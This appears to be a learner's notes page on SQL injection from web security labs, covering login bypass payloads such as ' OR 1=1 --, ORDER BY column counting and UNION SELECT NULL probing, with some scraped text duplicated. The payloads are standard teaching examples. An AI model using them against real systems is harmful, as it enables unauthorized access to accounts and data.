PSG SQL
Basic SQL Login Auth bypass
Note : If inside burp repeater , remember to CTRL + U to format the payload
burp repeater , remember to CTRL + U to format the payload' order by 1 --
' order by 1 -- will become
will become '+order+by+1+--
'+order+by+1+--Vuln code
`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`Crafting
SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'Exploit Delivery
administrator' --
' OR 1=1 --Type of SQL injections
inband SQLi: you get response akanormal sqliinferential SQLi: you don't get response akablind sqliOut-of-band-SQLi: your use aServeras man in middle send back the response to u
UNION attack to retreive data from other table
Vuln code
select * from categoryTable where category='Coporate Gifts'select * from categoryTable where category='Coporate Gifts'Determine number of columns
' order by 1 --
' order by 2 --Combine order by with select query
select * from categoryTable where category='' order by 1 --anything here gets ignored UNION SELECT can be used to double check the number of columns
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--Ensure same Data type
'a' , 'a'
123 , 'a123'characters?
alphanumeric?
numbers?
Last updated
Was this helpful?